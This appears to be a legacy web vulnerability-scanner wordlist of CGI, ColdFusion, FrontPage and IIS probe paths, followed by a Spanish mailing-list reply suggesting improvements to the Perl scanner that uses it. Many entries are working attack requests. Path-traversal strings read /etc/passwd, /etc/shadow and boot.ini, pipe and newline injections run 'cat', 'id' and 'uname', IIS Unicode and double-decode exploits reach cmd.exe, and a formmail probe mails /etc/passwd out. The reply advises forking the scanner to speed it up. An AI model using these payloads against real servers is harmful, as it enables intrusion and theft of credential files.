/cgi-bin/ftp/ftp.pl?dir=../../../../../../etc/passwd
/cgi-bin/ftp/ftp.pl
/cgi-bin/ftp
/cgi-bin/fruity_sub.pl
/cgi-bin/fpexplore.exe
/cgi-bin/forums/list.php
/cgi-bin/forum/ubb_library.pl
/cgi-bin/fortune
/cgi-bin/formnow.cgi
/cgi-bin/formmail.pl
/cgi-bin/formmail.cgi?env_report=/etc/passwd&recipient=ncr...@tmgroup.net&required=&firstname=&lastname=&email=&message=&Submit=hi
/cgi-bin/formmail.cgi
/cgi-bin/formhandler.cgi
/cgi-bin/form.pl
/cgi-bin/form.cgi
/cgi-bin/flexform.pl
/cgi-bin/flexform.cgi
/cgi-bin/finger?@localhost
/cgi-bin/finger.pl?ADDR=|127.0.0.1|
/cgi-bin/finger.pl
/cgi-bin/finger.cgi?host=|127.0.0.1|
/cgi-bin/finger.cgi
/cgi-bin/finger
/cgi-bin/files.pl
/cgi-bin/filemail.pl
/cgi-bin/faxsurvey?/bin/cat%20/etc/group
/cgi-bin/faxsurvey
/cgi-bin/ex-logger.pl
/cgi-bin/executor.cgi
/cgi-bin/excite
/cgi-bin/ews/ews/architext_query.pl
/cgi-bin/everythingform.cgi
/cgi-bin/environ.cgi
/cgi-bin/env.cgi
/cgi-bin/enter.cgi
/cgi-bin/empower
/cgi-bin/edit.pl
/cgi-bin/echo.bat?&type+d:\Progra~1\Sambar\config\passwd
/cgi-bin/dumpenv.pl
/cgi-bin/download.cgi
/cgi-bin/dnewsweb
/cgi-bin/displayTC.pl
/cgi-bin/dig.cgi
/cgi-bin/dfire.cgi
/cgi-bin/dbmlparser.exe
/cgi-bin/db2www/library/document.d2w/show
/cgi-bin/db_manager.cgi
/cgi-bin/day5notifier.cgi
/cgi-bin/day5datacopier.cgi
/cgi-bin/date
/cgi-bin/cstat.pl
/cgi-bin/csh
/cgi-bin/counter-ord
/cgi-bin/counterfiglet-ord
/cgi-bin/counterfiglet/nc/f=;echo;w;uname%20-a;id
/cgi-bin/counterfiglet/nc/f=;cat%20/etc/group
/cgi-bin/counterfiglet
/cgi-bin/counterbanner-ord
/cgi-bin/counterbanner
/cgi-bin/counter.pl
/cgi-bin/counter
/cgi-bin/count.cgi
/cgi-bin/commerce.cgi
/cgi-bin/commander.pl
/cgi-bin/clickresponder.pl
/cgi-bin/clickcount.pl?view=test
/cgi-bin/click.pl
/cgi-bin/classifieds.cgi
/cgi-bin/classified.cgi
/cgi-bin/change-your-password.pl~
/cgi-bin/cgiwrap
/cgi-bin/cgimail.exe
/cgi-bin/cgi-lib.pl
/cgi-bin/cgiforum.pl
/cgi-bin/ceilidh.exe
/cgi-bin/cbmc/forums.cgi
/cgi-bin/cartmanager.cgi
/cgi-bin/cart32/tempfiles.list
/cgi-bin/cart32.exe
/cgi-bin/cart.pl?env
/cgi-bin/cardboard.cgi
/cgi-bin/campas?%0als%20-lFa%20/etc
/cgi-bin/campas?%0acat%0a/etc/group%0a
/cgi-bin/campas
/cgi-bin/calender_admin.pl
/cgi-bin/calender.pl
/cgi-bin/calendar_admin.pl?config=|cat%20/etc/group|
/cgi-bin/cachemgr.cgi
/cgi-bin/cached_feed.cgi?../../../.+/etc/passwd
/cgi-bin/c32web.exe/ShowAdminDir
/cgi-bin/c_download.cgi
/cgi-bin/bulk/bulk.cgi
/cgi-bin/bnbsurvey.cgi
/cgi-bin/bnbform.cgi
/cgi-bin/bizdb1-search.cgi
/cgi-bin/bigconf.pl
/cgi-bin/bigconf.cgi
/cgi-bin/bbs_forum.cgi
/cgi-bin/bb-hostsvc.sh?HOSTSVC=/../../../../../../../../etc/group
/cgi-bin/bb-hist.sh
/cgi-bin/bb-hist
/cgi-bin/axs.cgi
/cgi-bin/ax-admin.cgi
/cgi-bin/ax.cgi
/cgi-bin/awl/auctionweaver.pl
/cgi-bin/authenticate.cgi
/cgi-bin/auktion.pl?menue=../../../../../../../../../../../../../etc/passwd
/cgi-bin/AT-generate.cgi
/cgi-bin/AT-admin.cgi
/cgi-bin/ash
/cgi-bin/archive.pl
/cgi-bin/archive.cgi
/cgi-bin/archive
/cgi-bin/architext_query.pl
/cgi-bin/architext_query.cgi
/cgi-bin/archie
/cgi-bin/apexec.pl
/cgi-bin/AnyForm2
/cgi-bin/AnyForm
/cgi-bin/AnyBoard.cgi
/cgi-bin/anacondaclip.pl
/cgi-bin/amlite/amadmin.pl
/cgi-bin/amadmin.pl
/cgi-bin/aliredir.exe
/cgi-bin/alibaba.pl
/cgi-bin/alibaba.cgi
/cgi-bin/aglimpse
/cgi-bin/af.cgi
/cgi-bin/ads/adpassword.txt
/cgi-bin/adpassword.txt
/cgi-bin/Admin_files/
/cgi-bin/add_ftp.pl
/cgi-bin/add_ftp.cgi
/cgi-bin/a1stats/a1disp4.cgi
/cgi-bin/a1stats/a1disp3.cgi
/cgi-bin/a1stats/a1disp2.cgi
/cgi-bin/a1stats/a1disp.cgi
/cgi-bin/.wwwacl
/cgi-bin/.htaccess~
/cgi-bin/.htaccess.old
/cgi-bin/.htaccess
/cgi-bin/.fhp
/cgi-bin/.cobalt/siteUserMod/siteUserMod.cgi
/cgi-bin/..\\..\\..\\..\\..\\..\\winnt\\system32\\cmd.exe?/c+dir+c:\\
/cgi-bin/
/cgi-auth/userreg.cgi
/cgi/commerce.cgi
/cgi/cgiproc
/cgi/amadmin.pl
/cgi/
/cfusion/database/smpolicy.mdb
/cfusion/database/cypress.mdb
/cfusion/database/cfsnippets.mdb
/cfusion/database/cfexamples.mdb
/cfusion/database/
/cfusion/cfapps/security/realm_.mdb
/cfusion/cfapps/security/data/realm.mdb
/cfusion/cfapps/forums/forums_.mdb
/cfusion/cfapps/forums/data/forums.mdb
/cfusion/
/CFIDE/Administrator/startstop.html
/CFIDE/Administrator/
/cfdocs/zero.cfm
/cfdocs/snippets/viewexample.cfm
/cfdocs/snippets/gettempdirectory.cfm
/cfdocs/snippets/fileexists.cfm
/cfdocs/snippets/evaluate.cfm
/cfdocs/snippets/
/cfdocs/root.cfm
/cfdocs/expressions.cfm
/cfdocs/expeval/openfile.cfm
/cfdocs/expeval/exprcalc.cfm
/cfdocs/expeval/displayopenedfile.cfm
/cfdocs/expelval/sendmail.cfm
/cfdocs/expelval/parks/detail.cfm
/cfdocs/expelval/openfile.cfm
/cfdocs/expelval/exprcalc.cfm
/cfdocs/expelval/eval.cfm
/cfdocs/expelval/displayopenedfile.cfm
/cfdocs/expelval/
/cfdocs/examples/parks/detail.cfm
/cfdocs/examples/mainframeset.cfm
/cfdocs/examples/cvbeans/beaninfo.cfm
/cfdocs/exampleapp/publish/admin/application.cfm
/cfdocs/exampleapp/publish/admin/addcontent.cfm
/cfdocs/exampleapp/publish/
/cfdocs/exampleapp/email/getfile.cfm?filename:=c:\boot.ini
/cfdocs/exampleapp/email/
/cfdocs/exampleapp/docs/sourcewindow.cfm
/cfdocs/cfmsyntaxcheck.cfm
/cfdocs/
/ccard/
/catalyst/exec/show/config/cr
/catalog.nsf
/cart/
/carbo.dll?icatcommand=..\..\boot.ini&catalogname=catalog
/cache-stats/
/c/
/buynow/
/bin/test.txt
/bin/sh/
/bin/scripts/Fpadmcgi.exe
/bin/fpsrvadm.exe
/bin/fpremadm.exe
/bin/fpadmin.htm
/bin/contents.htm
/bin/cfgwiz.exe
/bin/admin.pl
/bin/
/bin
/backup/
/aux/
/aux
/autoexec.bat
/atc/
/ASPSamp/AdvWorks/equipment/catalog_type.asp
/ASPSamp/AdvWorks/
/ASPSamp/
/ap_afodpdemo.shtml
/analog/
/allmanageup.pl
/allmanageup.cgi
/allmanage.?gi
/allmanage.pl
/Album/?mode=album&album=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc&dispsize=640&start=0
/AdvWorks/equipment/catalog_type.asp
/AdvWorks/equipment/
/adsamples/config/site.csc
/ads/adpassword.txt
/ads/
/admisapi/fpadmin.htm
/admisapi/
/admin-serv/config/admpw
/admin-serv/config/adm.conf
/adminlogin?RCpage=/sysadmin/index.stm
/administrator/
/admin4.nsf
/Admin_files/order.log
/Admin_files/
/admin/passwd.txt
/admin/passwd.html
/admin/main.cfm
/admin/login.cfm
/admin/
/admin.php3
/admcgi/contents.htm
/admcgi/
/accounting/
/account/
/access/
/~wsapi/cfusion
/~root/
/~nobody/etc/
/~ftp
/~admin
/_vti_pvt/writeto.cnf
/_vti_pvt/users.pwd
/_vti_pvt/svcacl.cnf
/_vti_pvt/shtml.exe
/_vti_pvt/shtml.dll
/_vti_pvt/services.stp
/_vti_pvt/services.cnf
/_vti_pvt/service.stp
/_vti_pvt/service.pwd
/_vti_pvt/service.grp
/_vti_pvt/service.cnf
/_vti_pvt/authors.pwd
/_vti_pvt/administrators.pwd
/_vti_pvt/admin.pwd
/_vti_pvt/access.stp
/_vti_pvt/access.cnf
/_vti_pvt/_vti_cnf
/_vti_pvt/
/_vti_log/author.log
/_vti_inf.html
/_vti_cnf
/_vti_bin/shtml.exe
/_vti_bin/shtml.dll
/_vti_bin/fpsrvadm.exe
/_vti_bin/fpremadm.exe
/_vti_bin/cfgwiz.exe
/_vti_bin/_vti_cnf
/_vti_bin/_vti_aut/dvwssr.dll
/_vti_bin/_vti_aut/author.exe
/_vti_bin/_vti_aut/author.dll
/_vti_bin/_vti_aut
/_vti_bin/_vti_adm/admin.dll
/_vti_bin/_vti_adm
/_vti_bin/..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\
/_vti_bin/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\
/_vti_bin/..%c0%af../..%c0%af../..%c0%af../temp/temp.exe?/c+dir+c:\
/_vti_bin/..%255c..%255c..%255c..%255c..%255c../winnt/system32/cmd.exe?/c+dir+c:\
/_vti_bin/..%255c..%255c..%255c..%255c..%255c../winnt/system32/cmd.exe?/c+dir+c:\
/_vti_bin/..%25%35%63..%25%35%63..%25%35%63..%25%35%63..%25%35%63../winnt/system32/
cmd.exe?/c+dir+c:\
/_vti_bin/..%25%35%63..%25%35%63..%25%35%63..%25%35%63..%25%35%63../winnt/system32/
cmd.exe?/c+dir+c:\
/_vti_bin/..%%35c..%%35c..%%35c..%%35c..%%35c../winnt/system32/cmd.exe?/c+dir+c:\
/_vti_bin/..%%35c..%%35c..%%35c..%%35c..%%35c../winnt/system32/cmd.exe?/c+dir+c:\
/_vti_bin/..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63../winnt/system32/cmd.exe?/c+dir+c:\
/_vti_bin/..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63../winnt/system32/cmd.exe?/c+dir+c:\
/_vti_bin/
/_vti_bin/
/_private/shopping_cart.mdb
/_private/registrations.txt
/_private/registrations.pl
/_private/registrations.htm
/_private/registration.cgi
/_private/register.txt
/_private/register.pl
/_private/register.htm
/_private/register.cgi
/_private/orders.txt
/_private/orders.htm
/_private/orders.cgi
/_private/order.pl
/_private/form_results.txt
/_private/form_results.pl
/_private/form_results.htm
/_private/form_results.cgi
/_private/
/_AuthChangeUrl?
/__vti_inf.html
/?wp-ver-info
/?wp-verify-link
/?wp-ver-diff
/?wp-usr-prop
/?wp-uncheckout
/?wp-stop-ver
/?wp-html-rend
/?wp-cs-dump
/?PageServices
//cgi-bin/
/.security/etc/passwd
/.secure/etc/passwd
/.htpasswd
/.html/............./config.sys
/.htaccess
/../config/html/cnf_gi.htm
/../../../../../../../../../../etc/passwd
/..../Windows/Admin.pwl
/....../Winnt/Admin.pwl
/....../Windows/Admin.pwl
/....../etc/shadow
/....../etc/security/passwd.adjunct
/....../etc/security/passwd
/....../etc/passwd
/....../etc/master.passwd
/....../autoexec.bat
/....../
/%2e%2e/%2e%2e/%2e%2e/scandisk.log
/%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/etc/passwd
a_ver_est
> Usen este programa en Perl y notifiquenme su eficacidad.
> Si creen que le falla algo, notifiquenmelo tambien!
> Copien el siguiente codigo en un fichero llamado TCS.PL
> y: C:>perl tcs.pl
Bonito programa ... que potito que es perl !!! ejem ...
No te puedo decir si realmente es eficaz buscando bugs o no, pq solo lo he
probado sobre mis maquinas ... y estas no tienen bugs ! :P
Al programa le falla un poco el chequeo de parametros, p. ej verificar
si las ips tienen el formato valido:
if($domain !~ /[0-9]+\.[0-9]+\.[0-9]+/)
algo como : 9999.999999.999999.99999 pasa el filtro sin problemas, seria
mejor algo como,
if ( $domain !~ m/(\d+)\.(\d+)\.(\d+)/ || $1>255 || $2>255 || $3>255 )
Otra sugerencia en vez de usar el tipico die cuando no se puede abrir un
fichero llamar a una funcion que mostrase un msj de error y reempezase el
programa, queda muy feo dejar uno de los parametros q pregunta en blanco
y ver como al poco el programa pega un casque ...
Y bueno ... para si quieres divertirte mas se me ocurre que la funcion
scannerloop() haga un fork del programa, asi tendras un hijo para cada
host de modo que escaneando una lista de ellos irias mucho mas rapido,
logicamente tendrias que poner un limite de hijos, bla bla ...
Puede ser interesante para aprender.
Saludos,
Roger_J